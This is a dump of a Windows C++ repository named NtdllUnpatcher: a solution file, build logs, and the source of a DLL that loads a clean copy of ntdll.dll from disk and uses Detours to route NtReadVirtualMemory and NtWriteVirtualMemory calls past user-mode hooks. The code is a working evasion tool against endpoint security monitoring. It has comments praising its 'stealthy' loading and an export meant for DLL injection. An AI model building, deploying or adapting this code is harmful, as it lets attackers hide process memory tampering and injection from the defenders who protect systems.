10.0.40219.1 6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "NtdllUnpatcher", "NtdllUnpatcher\NtdllUnpatcher.vcxproj", "{54EE62C1-6375-4EDF-B79D-3F918919C98C}" 7 | EndProject 8 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "NtdllUnpatcher_Injector", 
"NtdllUnpatcher_Injector\NtdllUnpatcher_Injector.vcxproj", "{59AE6F00-7B3B-4A2F-852F-7D71C04E5B0D}" 9 | EndProject 10 | Global 11 | GlobalSection(SolutionConfigurationPlatforms) = preSolution 12 | Debug|x64 = Debug|x64 13 | Debug|x86 = Debug|x86 14 | Release|x64 = Release|x64 15 | Release|x86 = Release|x86 16 | EndGlobalSection 17 | GlobalSection(ProjectConfigurationPlatforms) = postSolution 18 | {54EE62C1-6375-4EDF-B79D-3F918919C98C}.Debug|x64.ActiveCfg = Debug|x64 19 | {54EE62C1-6375-4EDF-B79D-3F918919C98C}.Debug|x64.Build.0 = Debug|x64 20 | {54EE62C1-6375-4EDF-B79D-3F918919C98C}.Debug|x86.ActiveCfg = Debug|Win32 21 | {54EE62C1-6375-4EDF-B79D-3F918919C98C}.Debug|x86.Build.0 = Debug|Win32 22 | {54EE62C1-6375-4EDF-B79D-3F918919C98C}.Release|x64.ActiveCfg = Release|x64 23 | {54EE62C1-6375-4EDF-B79D-3F918919C98C}.Release|x64.Build.0 = Release|x64 24 | {54EE62C1-6375-4EDF-B79D-3F918919C98C}.Release|x86.ActiveCfg = Release|Win32 25 | {54EE62C1-6375-4EDF-B79D-3F918919C98C}.Release|x86.Build.0 = Release|Win32 26 | {59AE6F00-7B3B-4A2F-852F-7D71C04E5B0D}.Debug|x64.ActiveCfg = Debug|x64 27 | {59AE6F00-7B3B-4A2F-852F-7D71C04E5B0D}.Debug|x64.Build.0 = Debug|x64 28 | {59AE6F00-7B3B-4A2F-852F-7D71C04E5B0D}.Debug|x86.ActiveCfg = Debug|Win32 29 | {59AE6F00-7B3B-4A2F-852F-7D71C04E5B0D}.Debug|x86.Build.0 = Debug|Win32 30 | {59AE6F00-7B3B-4A2F-852F-7D71C04E5B0D}.Release|x64.ActiveCfg = Release|x64 31 | {59AE6F00-7B3B-4A2F-852F-7D71C04E5B0D}.Release|x64.Build.0 = Release|x64 32 | {59AE6F00-7B3B-4A2F-852F-7D71C04E5B0D}.Release|x86.ActiveCfg = Release|Win32 33 | {59AE6F00-7B3B-4A2F-852F-7D71C04E5B0D}.Release|x86.Build.0 = Release|Win32 34 | EndGlobalSection 35 | GlobalSection(SolutionProperties) = preSolution 36 | HideSolutionNode = FALSE 37 | EndGlobalSection 38 | GlobalSection(ExtensibilityGlobals) = postSolution 39 | SolutionGuid = {CC6E8093-9247-4D66-82AE-9F6633A578D1} 40 | EndGlobalSection 41 | EndGlobal 42 | 
--------------------------------------------------------------------------------
/NtdllUnpatcher/NtdllUnpatcher.cpp:
--------------------------------------------------------------------------------
```cpp
// The two system include names were lost in extraction; windows.h and winternl.h
// are the headers that supply everything used below (NTSTATUS, OBJECT_ATTRIBUTES,
// UNICODE_STRING, InitializeObjectAttributes, TOKEN_ELEVATION, ...).
#include <windows.h>
#include <winternl.h>
#include "detours.h"

#ifndef NT_SUCCESS
#define NT_SUCCESS(Status) (((NTSTATUS)(Status)) >= 0)
#endif

using namespace std;

// Global states in-case we re-enter functions we can skip some setup
HANDLE ntSectionHandle = NULL;
PVOID sectionBaseAddress = NULL;

// Prototypes for some undocumented APIs we use
NTSTATUS(NTAPI *ZwCreateSection)
    (_Out_ PHANDLE SectionHandle, _In_ ACCESS_MASK DesiredAccess,
     _In_opt_ POBJECT_ATTRIBUTES ObjectAttributes,
     _In_opt_ PLARGE_INTEGER MaximumSize, _In_ ULONG SectionPageProtection,
     _In_ ULONG AllocationAttributes, _In_opt_ HANDLE FileHandle);

NTSTATUS(NTAPI *NtMapViewOfSection)
    (_In_ HANDLE SectionHandle, _In_ HANDLE ProcessHandle,
     _Inout_ PVOID *BaseAddress, _In_ ULONG_PTR ZeroBits, _In_ SIZE_T CommitSize,
     _Inout_opt_ PLARGE_INTEGER SectionOffset, _Inout_ PSIZE_T ViewSize,
     _In_ DWORD InheritDisposition, _In_ ULONG AllocationType,
     _In_ ULONG Win32Protect);

typedef VOID(__stdcall *_RtlInitUnicodeString)(
    PUNICODE_STRING DestinationString,
    PCWSTR SourceString
);

typedef enum _SECTION_INHERIT {
    ViewShare = 1,
    ViewUnmap = 2
} SECTION_INHERIT;

bool NtdllFunctionsLoaded = false;
HANDLE ntHandle = NULL;

// Load the basic undocumented APIs we may use
BOOL LoadNtdllFunctions() {
    HMODULE hNtdll = GetModuleHandleA("ntdll");
    if (hNtdll == NULL)
    {
        return FALSE;
    }
    ZwCreateSection = (NTSTATUS(NTAPI *)(
        PHANDLE, ACCESS_MASK, POBJECT_ATTRIBUTES, PLARGE_INTEGER, ULONG, ULONG,
        HANDLE))GetProcAddress(hNtdll, "ZwCreateSection");
    if (ZwCreateSection == NULL)
    {
        return FALSE;
    }
    NtMapViewOfSection = (NTSTATUS(NTAPI *)(
        HANDLE, HANDLE, PVOID *, ULONG_PTR, SIZE_T, PLARGE_INTEGER, PSIZE_T,
        DWORD, ULONG, ULONG))GetProcAddress(hNtdll, "NtMapViewOfSection");
    if (NtMapViewOfSection == NULL)
    {
        return FALSE;
    }
    NtdllFunctionsLoaded = true;
    return TRUE;
}

// For PE-parsing the headers differ between versions of windows, we determine which set to use here
#ifdef _WIN64
typedef DWORD64 POINTER;
typedef PIMAGE_DOS_HEADER PDOS_HEADER;
typedef PIMAGE_NT_HEADERS64 PNT_HEADER;
typedef PIMAGE_EXPORT_DIRECTORY PEXPORT_DIR;
#else
typedef DWORD POINTER;
typedef PIMAGE_DOS_HEADER PDOS_HEADER;
typedef PIMAGE_NT_HEADERS PNT_HEADER;
typedef PIMAGE_EXPORT_DIRECTORY PEXPORT_DIR;
#endif

// As we are dealing with flat-files and not relocating the new ntdll, we need to convert virtual address offsets into file offsets
DWORD RvaToOffset(IMAGE_NT_HEADERS * nth, DWORD RVA)
{
    int i;
    int sections;
    PIMAGE_SECTION_HEADER sectionHeader;
    sectionHeader = IMAGE_FIRST_SECTION(nth);
    sections = nth->FileHeader.NumberOfSections;

    for (i = 0; i < sections; i++)
    {
        if (sectionHeader->VirtualAddress <= RVA)
            if ((sectionHeader->VirtualAddress + sectionHeader->Misc.VirtualSize) > RVA)
            {
                RVA -= sectionHeader->VirtualAddress;
                RVA += sectionHeader->PointerToRawData;
                return RVA;
            }
        sectionHeader++;
    }
    return 0;
}

DWORD FindRVA(LPBYTE pFileMap, IMAGE_NT_HEADERS *pNtHdr, DWORD Rva)
{
    // Find the file byte offset for the given RVA
    int i = 0,
        nSections = (int)pNtHdr->FileHeader.NumberOfSections;
    IMAGE_SECTION_HEADER *pSectHdr;

    pSectHdr = (IMAGE_SECTION_HEADER *)((LPSTR)pNtHdr +
        sizeof(IMAGE_NT_HEADERS));
    while ((i < nSections) && ((pSectHdr[i].VirtualAddress +
        pSectHdr[i].Misc.VirtualSize - 1) < Rva)) {
        i++;
    }
    // No section covers this RVA. Test i == nSections before indexing so that
    // pSectHdr[nSections] (one past the table) is never read.
    if ((i == nSections) || (pSectHdr[i].VirtualAddress > Rva)) {
        return 0;
    }
    return pSectHdr[i].PointerToRawData +
        Rva - pSectHdr[i].VirtualAddress;
}

DWORD GetExportRVA(LPBYTE pExpSect, DWORD SectRva, char *szFunction)
{
    // Scan the export section to see if the specified function name
    // can be found. If found, we return its RVA.
    DWORD i = 0;
    IMAGE_EXPORT_DIRECTORY *pDir;
    DWORD *pNames, *pAddr;
    WORD *pOrd;

    pDir = (IMAGE_EXPORT_DIRECTORY *)pExpSect;
    pNames = (DWORD *)(pExpSect +
        (DWORD)pDir->AddressOfNames - SectRva);
    while ((i < pDir->NumberOfNames) && (strcmp((CHAR*)pExpSect +
        (pNames[i] - SectRva), szFunction) != 0)) {
        i++;
    }
    if (i == pDir->NumberOfNames)
        return 0; // Function not found

    // Get Function ordinal
    pOrd = (WORD *)(pExpSect +
        (DWORD)pDir->AddressOfNameOrdinals - SectRva);

    // Get function address table. Function RVA is at ordinal index
    pAddr = (DWORD *)(pExpSect +
        (DWORD)pDir->AddressOfFunctions - SectRva);
    return pAddr[pOrd[i]];
}

POINTER GetAddress(HMODULE Handle, char* funcName)
{
    POINTER dwAckBase = (POINTER)Handle;
    PDOS_HEADER pIDH = (PDOS_HEADER)dwAckBase;
    PNT_HEADER pINH = (PNT_HEADER)((POINTER)dwAckBase + pIDH->e_lfanew);
    PEXPORT_DIR pIED = (PEXPORT_DIR)(dwAckBase + pINH->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
    DWORD ExpOff = FindRVA((LPBYTE)dwAckBase, pINH, (DWORD)pINH->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress);
    DWORD exportRVA = GetExportRVA((LPBYTE)dwAckBase + ExpOff, (DWORD)pINH->OptionalHeader.DataDirectory[IMAGE_DIRECTORY_ENTRY_EXPORT].VirtualAddress, (char*)funcName);
    POINTER dwFunc = dwAckBase + FindRVA((LPBYTE)dwAckBase, pINH, exportRVA);
    return dwFunc;
}

// Check if process is running with admin permissions, determines if we use sections (more stealthy) or virtualallocs (not stealthy)
BOOL IsElevated() {
    BOOL fRet = FALSE;
    HANDLE hToken = NULL;
    if (OpenProcessToken(GetCurrentProcess(), TOKEN_QUERY, &hToken)) {
        TOKEN_ELEVATION Elevation;
        DWORD cbSize = sizeof(TOKEN_ELEVATION);
        if (GetTokenInformation(hToken, TokenElevation, &Elevation, sizeof(Elevation), &cbSize)) {
            fRet = Elevation.TokenIsElevated;
        }
    }
    if (hToken) {
        CloseHandle(hToken);
    }
    return fRet;
}

PVOID ntdllBuf = NULL;

VOID CALLBACK FileIOCompletionRoutine(
    __in DWORD dwErrorCode,
    __in DWORD dwNumberOfBytesTransfered,
    __in LPOVERLAPPED lpOverlapped
);

VOID CALLBACK FileIOCompletionRoutine(
    __in DWORD dwErrorCode,
    __in DWORD dwNumberOfBytesTransfered,
    __in LPOVERLAPPED lpOverlapped)
{
}

// Returns a non-hooked address of an NTDLL function
__declspec(dllexport) POINTER GetAddressFromName(char* functionName)
{
    // Check some global states in-case we run this function multiple times(optional)
    BOOL resi;
    if (!NtdllFunctionsLoaded)
    {
        resi = LoadNtdllFunctions();
    }
    else {
        resi = true;
    }
    if (!resi)
    {
        return NULL;
    }
    if (ntdllBuf != NULL)
    {
        return GetAddress((HMODULE)ntdllBuf, functionName);
    }
    if (ntSectionHandle == NULL)
    {
        if (ntHandle == NULL)
        {
            ntHandle = CreateFileA(R"(\\?\C:\windows\system32\ntdll.dll)", GENERIC_READ | GENERIC_EXECUTE, FILE_SHARE_READ, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_READONLY, NULL);
            // CreateFile reports failure through its return value; GetLastError() can be
            // non-zero after a successful call, so it is not a valid failure test here.
            if (ntHandle == INVALID_HANDLE_VALUE)
            {
                ntHandle = NULL;
                return NULL;
            }
        }
        OBJECT_ATTRIBUTES ntObjAtt;
        UNICODE_STRING ntPath;
        // Same path as the raw literal above; in a normal wide literal every backslash must be doubled
        PCWSTR filePath = L"\\\\?\\c:\\windows\\system32\\ntdll.dll";
        _RtlInitUnicodeString RtlInitUnicodeString = (_RtlInitUnicodeString)GetProcAddress(GetModuleHandle(L"ntdll.dll"), "RtlInitUnicodeString");
        RtlInitUnicodeString(&ntPath, filePath);
        InitializeObjectAttributes(&ntObjAtt, &ntPath, OBJ_CASE_INSENSITIVE | OBJ_INHERIT, NULL, NULL);
        LARGE_INTEGER ntLargeInt;
        ntLargeInt.QuadPart = 0;
        BOOL res = GetFileSizeEx(ntHandle, &ntLargeInt);
        if (!res)
        {
            CloseHandle(ntHandle);
            ntHandle = NULL;
            return NULL;
        }
        NTSTATUS status;
        // If we're elevated we can load an un-hooked ntdll in a more stealthy manner
        if (IsElevated())
        {
            status = ZwCreateSection(&ntSectionHandle, SECTION_MAP_EXECUTE, &ntObjAtt, &ntLargeInt, PAGE_EXECUTE, SEC_COMMIT, ntHandle);
            if (!NT_SUCCESS(status))
            {
                CloseHandle(ntHandle);
                ntHandle = NULL;
                return NULL;
            }
        }
        else { // If we're non-elevated we do things the n00b way, improvement can be made here to prevent a single buffer being RWX at any single time
            ntdllBuf = VirtualAlloc(NULL, (SIZE_T)ntLargeInt.QuadPart, MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);
            if (ntdllBuf == NULL)
            {
                return NULL;
            }
            // The handle was not opened with FILE_FLAG_OVERLAPPED, so read it synchronously
            // with ReadFile (ReadFileEx requires an overlapped handle and returns before the
            // buffer is guaranteed to be filled).
            DWORD bytesRead = 0;
            res = ReadFile(ntHandle, ntdllBuf, (DWORD)ntLargeInt.QuadPart, &bytesRead, NULL);
            if (!res || bytesRead != (DWORD)ntLargeInt.QuadPart)
            {
                VirtualFree(ntdllBuf, 0, MEM_RELEASE);
                ntdllBuf = NULL;
                return NULL;
            }
            else { // If we're not elevated then this function returns here
                CloseHandle(ntHandle);
                ntHandle = NULL;
                return GetAddress((HMODULE)ntdllBuf, functionName);
            }
        } // If we're elevated we continue with the stealthier approach
        SIZE_T ntSizeofSectionView = 0;
        status = NtMapViewOfSection(ntSectionHandle, GetCurrentProcess(), &sectionBaseAddress, 0,
            0, NULL, &ntSizeofSectionView, ViewShare, 0, PAGE_EXECUTE);
        if (!NT_SUCCESS(status))
        {
            CloseHandle(ntHandle);
            CloseHandle(ntSectionHandle);
            ntHandle = NULL;
            ntSectionHandle = NULL;
            return NULL;
        }
    }
    if (ntHandle != NULL)
    {
        CloseHandle(ntHandle);
        ntHandle = NULL;
    }
    return GetAddress((HMODULE)sectionBaseAddress, functionName);
}

LONG error;

// Define prototype of functions to hook
NTSTATUS(WINAPI* fNtReadVirtualMemory)(HANDLE ProcessHandle, PVOID BaseAddress, PVOID Buffer, ULONG NumberOfBytesToRead, PULONG NumberOfBytesReaded);
NTSTATUS(WINAPI *fNtCreateThreadEx)
(
    OUT PHANDLE hThread,
    IN ACCESS_MASK DesiredAccess,
    IN LPVOID ObjectAttributes,
    IN HANDLE ProcessHandle,
    IN LPTHREAD_START_ROUTINE lpStartAddress,
    IN LPVOID lpParameter,
    IN BOOL CreateSuspended,
    IN ULONG StackZeroBits,
    IN ULONG SizeOfStackCommit,
    IN ULONG SizeOfStackReserve,
    OUT LPVOID lpBytesBuffer
);
NTSTATUS(WINAPI* fNtWriteVirtualMemory)(HANDLE ProcessHandle, PVOID BaseAddress, PVOID Buffer, ULONG NumberOfBytesToWrite, PULONG NumberOfBytesWritten);

// Create "My" versions of hooked functions that redirect execution to non-hooked versions of that function (prototypes must match)
NTSTATUS MyNtReadVirtualMemory(HANDLE ProcessHandle, PVOID BaseAddress, PVOID Buffer, ULONG NumberOfBytesToRead, PULONG NumberOfBytesReaded)
{
    fNtReadVirtualMemory = (NTSTATUS(WINAPI *)(HANDLE ProcessHandle, PVOID BaseAddress, PVOID Buffer, ULONG NumberOfBytesToRead, PULONG NumberOfBytesReaded))GetAddressFromName("NtReadVirtualMemory");
    return fNtReadVirtualMemory(ProcessHandle, BaseAddress, Buffer, NumberOfBytesToRead, NumberOfBytesReaded);
}

NTSTATUS MyNtWriteVirtualMemory(HANDLE ProcessHandle, PVOID BaseAddress, PVOID Buffer, ULONG NumberOfBytesToWrite, PULONG NumberOfBytesWritten)
{
    fNtWriteVirtualMemory = (NTSTATUS(WINAPI *)(HANDLE ProcessHandle, PVOID BaseAddress, PVOID Buffer, ULONG NumberOfBytesToWrite, PULONG NumberOfBytesWritten))\
        GetAddressFromName("NtWriteVirtualMemory");
    return fNtWriteVirtualMemory(ProcessHandle, BaseAddress, Buffer, NumberOfBytesToWrite, NumberOfBytesWritten);
}

NTSTATUS MyNtCreateThreadEx(OUT PHANDLE hThread,
    IN ACCESS_MASK DesiredAccess,
    IN LPVOID ObjectAttributes,
    IN HANDLE ProcessHandle,
    IN LPTHREAD_START_ROUTINE lpStartAddress,
    IN LPVOID lpParameter,
    IN BOOL CreateSuspended,
    IN ULONG StackZeroBits,
    IN ULONG SizeOfStackCommit,
    IN ULONG SizeOfStackReserve,
    OUT LPVOID lpBytesBuffer)
{
    fNtCreateThreadEx = (NTSTATUS(WINAPI *)
        (
            OUT PHANDLE hThread,
            IN ACCESS_MASK DesiredAccess,
            IN LPVOID ObjectAttributes,
            IN HANDLE ProcessHandle,
            IN LPTHREAD_START_ROUTINE lpStartAddress,
            IN LPVOID lpParameter,
            IN BOOL CreateSuspended,
            IN ULONG StackZeroBits,
            IN ULONG SizeOfStackCommit,
            IN ULONG SizeOfStackReserve,
            OUT LPVOID lpBytesBuffer
        ))GetAddressFromName("NtCreateThreadEx");
    return fNtCreateThreadEx(hThread, DesiredAccess, ObjectAttributes, ProcessHandle, lpStartAddress, lpParameter, CreateSuspended, StackZeroBits, SizeOfStackCommit, SizeOfStackReserve, lpBytesBuffer);
}

// Global state to ensure we don't initiate twice
bool init = false;

// Exported initialization so that if we use something like DLL injection we pass this function as a param to e.g. CreateRemoteThread
extern "C"
__declspec(dllexport) BOOL InitializeHooks()
{
    if (init) {
        return TRUE;
    }
    // Hook library initialization
    DetourRestoreAfterWith();
    DetourTransactionBegin();
    DetourUpdateThread(GetCurrentThread());
    // Load address of functions to hook
    fNtReadVirtualMemory = (NTSTATUS(WINAPI *)(HANDLE ProcessHandle, PVOID BaseAddress, PVOID Buffer, ULONG NumberOfBytesToRead, PULONG NumberOfBytesReaded))\
        GetProcAddress(LoadLibraryA("ntdll.dll"), "NtReadVirtualMemory");
    fNtCreateThreadEx = (NTSTATUS(WINAPI *)
        (
            OUT PHANDLE hThread,
            IN ACCESS_MASK DesiredAccess,
            IN LPVOID ObjectAttributes,
            IN HANDLE ProcessHandle,
            IN LPTHREAD_START_ROUTINE lpStartAddress,
            IN LPVOID lpParameter,
            IN BOOL CreateSuspended,
            IN ULONG StackZeroBits,
            IN ULONG SizeOfStackCommit,
            IN ULONG SizeOfStackReserve,
            OUT LPVOID lpBytesBuffer
        ))GetProcAddress(LoadLibraryA("ntdll.dll"), "NtCreateThreadEx");
    fNtWriteVirtualMemory = (NTSTATUS(WINAPI* )(HANDLE ProcessHandle, PVOID BaseAddress, PVOID Buffer, ULONG NumberOfBytesToWrite, PULONG NumberOfBytesWritten))\
        GetProcAddress(LoadLibraryA("ntdll.dll"), "NtWriteVirtualMemory");
    // Add hooks
    DetourAttach(&(PVOID&)fNtReadVirtualMemory, MyNtReadVirtualMemory);
    //DetourAttach(&(PVOID&)fNtCreateThreadEx, MyNtCreateThreadEx);
    DetourAttach(&(PVOID&)fNtWriteVirtualMemory, MyNtWriteVirtualMemory);
    // Commit all the hooks
    error = DetourTransactionCommit();
    if (error != NO_ERROR)
    {
        return FALSE;
    }
    init = true;
    return TRUE;
}

extern "C"
__declspec(dllexport)
BOOL APIENTRY DllMain(HMODULE hModule,
                      DWORD ul_reason_for_call,
                      LPVOID lpReserved
)
{
    switch (ul_reason_for_call)
    {
    case DLL_PROCESS_ATTACH:
        return InitializeHooks();
    case DLL_THREAD_ATTACH:
    case DLL_THREAD_DETACH:
    case DLL_PROCESS_DETACH:
        break;
    }
    return TRUE;
}
```
--------------------------------------------------------------------------------
/NtdllUnpatcher/NtdllUnpatcher.h:
--------------------------------------------------------------------------------
```cpp
#pragma once
extern "C" __declspec(dllexport) BOOL InitializeHooks();
```
--------------------------------------------------------------------------------
/NtdllUnpatcher/NtdllUnpatcher.vcxproj:
--------------------------------------------------------------------------------
(MSBuild project file; the XML element tags were lost in extraction and only the element values survive. Recoverable settings: ToolsVersion 15.0, project GUID {54EE62C1-6375-4EDF-B79D-3F918919C98C}, root namespace NtdllUnpatcher, Windows SDK 10.0.10240.0; Debug and Release configurations for Win32 and x64, all of type DynamicLibrary, toolset v141, Unicode character set. The Win32 configurations use precompiled headers (Use), warning Level3, and define WIN32;_DEBUG or NDEBUG;NTDLLUNPATCHER_EXPORTS;_WINDOWS;_USRDLL. Debug|x64 uses NotUsing for precompiled headers, stdcpp14, MultiThreadedDLL runtime, the include path C:\Users\devl\source\repos\pe-parse-master\pe-parser-library\include\parser-library and links C:\Users\devl\source\repos\pe-parse-master\pe-parser-library\Release\pe-parser-library.lib. Release|x64 uses NotUsing, MaxSpeed, stdcpp14, MultiThreadedDLL, the include path ..\Detours-master\include and links Advapi32.lib;..\Detours-master\lib.X64\detours.lib.)
--------------------------------------------------------------------------------
/NtdllUnpatcher/NtdllUnpatcher.vcxproj.filters:
--------------------------------------------------------------------------------
(Visual Studio filter file; tags lost in extraction. It defines the default Source Files filter {4FC737F1-C7A5-4376-A066-2A32D752A2FF} for cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx, the Header Files filter {93995380-89BD-4b04-88EB-625FBE52EBFB} for h;hh;hpp;hxx;hm;inl;inc;ipp;xsd, and the Resource Files filter {67DA6AB6-F800-4c08-8B7A-83BB121AAD01} for rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms; two headers are placed under Header Files and one source file under Source Files.)
--------------------------------------------------------------------------------
/NtdllUnpatcher/NtdllUnpatcher.vcxproj.user:
--------------------------------------------------------------------------------
(Empty per-user project settings file.)
--------------------------------------------------------------------------------
/NtdllUnpatcher/targetver.h:
--------------------------------------------------------------------------------
#pragma once

| // Including SDKDDKVer.h defines the highest available Windows platform. 4 | 5 | // If you wish to build your application for a previous Windows platform, include WinSDKVer.h and 6 | // set the _WIN32_WINNT macro to the platform you wish to support before including SDKDDKVer.h. 7 | 8 | #include 9 | -------------------------------------------------------------------------------- /NtdllUnpatcher/x64/Debug/NtdllUnpatcher.Build.CppClean.log: -------------------------------------------------------------------------------- 1 | c:\users\devl\source\repos\ntdllunpatcher\ntdllunpatcher\x64\debug\ntdllunpatcher.pch 2 | c:\users\devl\source\repos\ntdllunpatcher\ntdllunpatcher\x64\debug\vc141.pdb 3 | c:\users\devl\source\repos\ntdllunpatcher\ntdllunpatcher\x64\debug\vc141.idb 4 | c:\users\devl\source\repos\ntdllunpatcher\ntdllunpatcher\x64\debug\stdafx.obj 5 | c:\users\devl\source\repos\ntdllunpatcher\ntdllunpatcher\x64\debug\ntdllunpatcher.obj 6 | c:\users\devl\source\repos\ntdllunpatcher\x64\debug\ntdllunpatcher.pdb 7 | c:\users\devl\source\repos\ntdllunpatcher\ntdllunpatcher\x64\debug\ntdllunpatcher.tlog\cl.command.1.tlog 8 | c:\users\devl\source\repos\ntdllunpatcher\ntdllunpatcher\x64\debug\ntdllunpatcher.tlog\cl.read.1.tlog 9 | c:\users\devl\source\repos\ntdllunpatcher\ntdllunpatcher\x64\debug\ntdllunpatcher.tlog\cl.write.1.tlog 10 | c:\users\devl\source\repos\ntdllunpatcher\ntdllunpatcher\x64\debug\ntdllunpatcher.tlog\link-cvtres.read.1.tlog 11 | c:\users\devl\source\repos\ntdllunpatcher\ntdllunpatcher\x64\debug\ntdllunpatcher.tlog\link-cvtres.write.1.tlog 12 | c:\users\devl\source\repos\ntdllunpatcher\ntdllunpatcher\x64\debug\ntdllunpatcher.tlog\link-mt.read.1.tlog 13 | c:\users\devl\source\repos\ntdllunpatcher\ntdllunpatcher\x64\debug\ntdllunpatcher.tlog\link-mt.write.1.tlog 14 | c:\users\devl\source\repos\ntdllunpatcher\ntdllunpatcher\x64\debug\ntdllunpatcher.tlog\link-rc.read.1.tlog 15 | 
c:\users\devl\source\repos\ntdllunpatcher\ntdllunpatcher\x64\debug\ntdllunpatcher.tlog\link-rc.write.1.tlog 16 | c:\users\devl\source\repos\ntdllunpatcher\ntdllunpatcher\x64\debug\ntdllunpatcher.tlog\link.command.1.tlog 17 | c:\users\devl\source\repos\ntdllunpatcher\ntdllunpatcher\x64\debug\ntdllunpatcher.tlog\link.read.1.tlog 18 | c:\users\devl\source\repos\ntdllunpatcher\ntdllunpatcher\x64\debug\ntdllunpatcher.tlog\link.write.1.tlog 19 | -------------------------------------------------------------------------------- /NtdllUnpatcher/x64/Debug/NtdllUnpatcher.log: -------------------------------------------------------------------------------- 1 |  NtdllUnpatcher.cpp 2 | c:\users\devl\source\repos\ntdllunpatcher\ntdllunpatcher\ntdllunpatcher.cpp(3): fatal error C1083: Cannot open include file: 'detours.h': No such file or directory 3 | -------------------------------------------------------------------------------- /NtdllUnpatcher/x64/Debug/NtdllUnpatcher.pch: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/NtdllUnpatcher/x64/Debug/NtdllUnpatcher.pch -------------------------------------------------------------------------------- /NtdllUnpatcher/x64/Debug/NtdllUnpatcher.tlog/CL.command.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/NtdllUnpatcher/x64/Debug/NtdllUnpatcher.tlog/CL.command.1.tlog -------------------------------------------------------------------------------- /NtdllUnpatcher/x64/Debug/NtdllUnpatcher.tlog/CL.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/NtdllUnpatcher/x64/Debug/NtdllUnpatcher.tlog/CL.read.1.tlog 
-------------------------------------------------------------------------------- /NtdllUnpatcher/x64/Debug/NtdllUnpatcher.tlog/CL.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/NtdllUnpatcher/x64/Debug/NtdllUnpatcher.tlog/CL.write.1.tlog -------------------------------------------------------------------------------- /NtdllUnpatcher/x64/Debug/NtdllUnpatcher.tlog/NtdllUnpatcher.lastbuildstate: -------------------------------------------------------------------------------- 1 | #TargetFrameworkVersion=v4.0:PlatformToolSet=v141:EnableManagedIncrementalBuild=false:VCToolArchitecture=Native32Bit:WindowsTargetPlatformVersion=10.0.10240.0 2 | Debug|x64|C:\Users\devl\source\repos\NtdllUnpatcher\| 3 | -------------------------------------------------------------------------------- /NtdllUnpatcher/x64/Debug/NtdllUnpatcher.tlog/link-cvtres.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/NtdllUnpatcher/x64/Debug/NtdllUnpatcher.tlog/link-cvtres.read.1.tlog -------------------------------------------------------------------------------- /NtdllUnpatcher/x64/Debug/NtdllUnpatcher.tlog/link-cvtres.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/NtdllUnpatcher/x64/Debug/NtdllUnpatcher.tlog/link-cvtres.write.1.tlog -------------------------------------------------------------------------------- /NtdllUnpatcher/x64/Debug/NtdllUnpatcher.tlog/link-mt.read.1.tlog: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/NtdllUnpatcher/x64/Debug/NtdllUnpatcher.tlog/link-mt.read.1.tlog -------------------------------------------------------------------------------- /NtdllUnpatcher/x64/Debug/NtdllUnpatcher.tlog/link-mt.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/NtdllUnpatcher/x64/Debug/NtdllUnpatcher.tlog/link-mt.write.1.tlog -------------------------------------------------------------------------------- /NtdllUnpatcher/x64/Debug/NtdllUnpatcher.tlog/link-rc.read.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/NtdllUnpatcher/x64/Debug/NtdllUnpatcher.tlog/link-rc.read.1.tlog -------------------------------------------------------------------------------- /NtdllUnpatcher/x64/Debug/NtdllUnpatcher.tlog/link-rc.write.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/NtdllUnpatcher/x64/Debug/NtdllUnpatcher.tlog/link-rc.write.1.tlog -------------------------------------------------------------------------------- /NtdllUnpatcher/x64/Debug/NtdllUnpatcher.tlog/link.command.1.tlog: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/Signal-Labs/NtdllUnpatcher/889ae63a80c857af386286ae0169a0cb40f28cc4/NtdllUnpatcher/x64/Debug/NtdllUnpatcher.tlog/link.command.1.tlog -------------------------------------------------------------------------------- /NtdllUnpatcher/x64/Debug/NtdllUnpatcher.tlog/link.read.1.tlog: -------------------------------------------------------------------------------- 
